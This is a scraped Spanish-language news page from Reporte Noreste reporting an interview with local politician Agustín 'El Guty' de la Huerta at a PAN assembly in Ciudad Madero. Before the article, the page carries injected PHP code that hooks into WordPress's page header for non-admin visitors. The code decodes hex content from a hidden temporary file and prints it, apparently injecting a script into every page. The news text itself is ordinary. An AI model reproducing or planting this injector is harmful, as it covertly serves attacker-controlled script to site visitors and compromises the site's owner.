if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “Simplemente soy El Guty” – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

“Simplemente soy El Guty”

“Simplemente soy El Guty”

Ciudad Madero, Tamaulipas- En días pasados, Agustín de la Huerta Mejía fue entrevistado durante la asamblea municipal del Partido Acción Nacional (PAN) en Ciudad Madero, en la que se designó como nuevo presidente de este partido al Dr. Francisco Castañeda.

La entrevista realizada por el medio INFOTAM, describe a un Agustín de la Huerta que sin ser pasivo, espera los tiempos para realizar declaraciones o para realizar algún movimiento político.

Fue cuestionado sobre la posibilidad de ser llamado por el nuevo Gobierno del Estado, al ser un activo político importante, no solo en Ciudad Madero, sino en el estado.

Humilde y coherente a su ética, responde que a su perspectiva las probabilidades de que eso ocurra son prácticamente nulas.

“El Guty”, como a él le gusta que le llamen, dijo que él sigue en su trabajo y que es simplemente “El Guty”.

La entrevista completa en este enlace  

Simplemente El Guty

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas